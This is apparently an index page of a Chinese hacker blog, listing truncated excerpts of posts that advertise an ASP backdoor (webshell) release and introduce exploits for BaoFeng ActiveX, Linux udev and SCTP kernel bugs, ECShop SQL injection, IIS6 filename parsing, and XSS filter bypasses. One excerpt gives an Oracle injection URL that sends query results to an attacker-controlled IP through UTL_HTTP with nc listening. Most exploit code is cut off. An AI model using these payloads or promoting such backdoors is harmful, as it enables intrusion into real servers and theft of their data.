导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

php pear mail包任意文件读写漏洞

PHP的官方开源类库, PHP Extension and Application Repository的缩写。PEAR将PHP程序开发过程中常用的功能编写成类库,涵盖了页面呈面、数据库访问、文件操作、数据结构、缓存操作、网络协 议等许多方面,用户可以很方便地使用。它是一个PHP扩展及应用的一个代码仓库,简单地说,PEAR就是PHP的cpan。但是80sec发现,Pear 的Mail模块存在安全漏洞,某些情况下将导致用户以webserver权限在主机上读写操作系统任意文件,继而控制主机执行php代码等。

...

PHP漏洞挖掘技术

PHP是一种被广泛使用的脚本语言,尤其适合于web开发。具有跨平台,容易学习,功能强

大等特点,据统计全世界有超过34%的网站有php的应用,包括Yahoo、sina、163、sohu等大型

门户网站。而且很多具名的web应用系统(包括bbs,blog,wiki,cms等等)都是使用php开发的,

Discuz、phpwind、phpbb、vbb、wordpress

......

Oracle+nc注射

首先外网nc监听对应的端口

url语句简单如下所示:

http://www.exploits.com.cn/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--



内容如下:

........

MSSQL注入利用Group by&having猜表名和字段名

lcx和剑心等大牛在06年的时候就已经在用这种语法了,而我等小辈到最近才领略到,惭愧惭愧......



手头暂时没有注入点测试,就先以我机器上的MSSQL做实验吧。

下面的语句我直接写完整的SQL语句,注入的时候稍微改改就能用了,呵呵。



假如现在有个注入点,所查询表的结构如下图:

....

BaoFeng ActiveX OnBeforeVideoDownload() Remote BOF Exploit

# BaoFeng (mps.dll) Remote Code Execution Exploit

# By: MITBOY

# Download: www.baofeng.com

...

Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit

* udev < 141 Local Privilege Escalation Exploit

* Jon Oberheide <jon@oberheide.org>

* http://jon.oberheide.org

*

...

Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit

CVE-2009-0065 SCTP FWD Chunk Memory Corruption

* Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit

*

* coded by: sgrakkyu <at> antifork.org

* http://kernelbof.blogspot.com

*

*

* NOTE: you need at least one sctp application

....

ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability

Application Info:

# Name: ECSHOP

# Version: 2.5.0

# Website: http://www.ecshop.com

.....

XSS下的绕过过滤方法

BY:PORUIN
很久没有写过文章了,今天写一篇小品文,仍然是关于XSS下的利用。
很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成&lt;以及&gt;,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么<script src=1.js></script>就会转换成“&lt;script src=1.js&gt;&lt;/script&gt;”,不能执行,因此,很多人认为只要用户的输入没有构成<>,就不能闭合前后的标签,其语句当然也不会有害。
但是,万事总有可能,只要有一定的条件,我们就可以构造经

.....

Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability

IIS6 (Internet Infomation Server 6.0) 是微软出品的一款WEB服务器系统, 广泛用于各种个人/商业信息发布/网站架设领域。80sec在测试中发现, IIS设计上在处理畸形文件名的时候存在一个严重的安全漏洞, 可能绕过web程序的逻辑检查从而能导致服务器以IIS进程权限执行任意恶意用户定义的脚本, 黑客可以通过制造畸形的服务器文件来触发该 漏洞, 并从而控制服

.....

分页:[«]10[11][12][13][14][15][16][17][18][19][20][21][22][23][24][»]

日历

<< 2014-4 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved